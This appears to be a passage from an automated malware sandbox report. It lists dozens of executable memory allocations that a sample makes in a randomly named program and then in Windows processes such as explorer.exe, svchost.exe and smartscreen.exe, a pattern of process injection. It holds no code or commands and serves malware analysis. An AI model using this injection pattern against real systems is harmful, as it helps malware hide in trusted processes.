        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 920000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 970000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 520000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 530000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 4F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 500000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 860000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 870000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 5D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 5E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1140000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1150000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 9B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 9C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 10A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 10B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: DB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: DC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 3B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 3C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 9F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1360000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1370000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: AE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 660000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 670000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: E60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: E70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 800000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 810000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 12B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 12C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: CC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: CD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: AE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1040000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1050000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1320000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1330000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1360000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1370000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 13A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 13B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 850000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 860000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 870000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 880000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: FA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 10A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 10F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 750000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 9C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 9D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 870000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 880000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: D20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: D70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 660000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 670000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: AE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 850000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 860000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1300000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1310000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: C10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: C20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: FD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1020000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 13E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1430000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: 700000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: D40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 840000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dwm.exe base: 900000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\sihost.exe base: AD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: 920000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: 9B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: A60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\explorer.exe base: 1220000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: D50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 120000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: AC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 2A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 590000 protect: page execute and read and writeJump to behavior
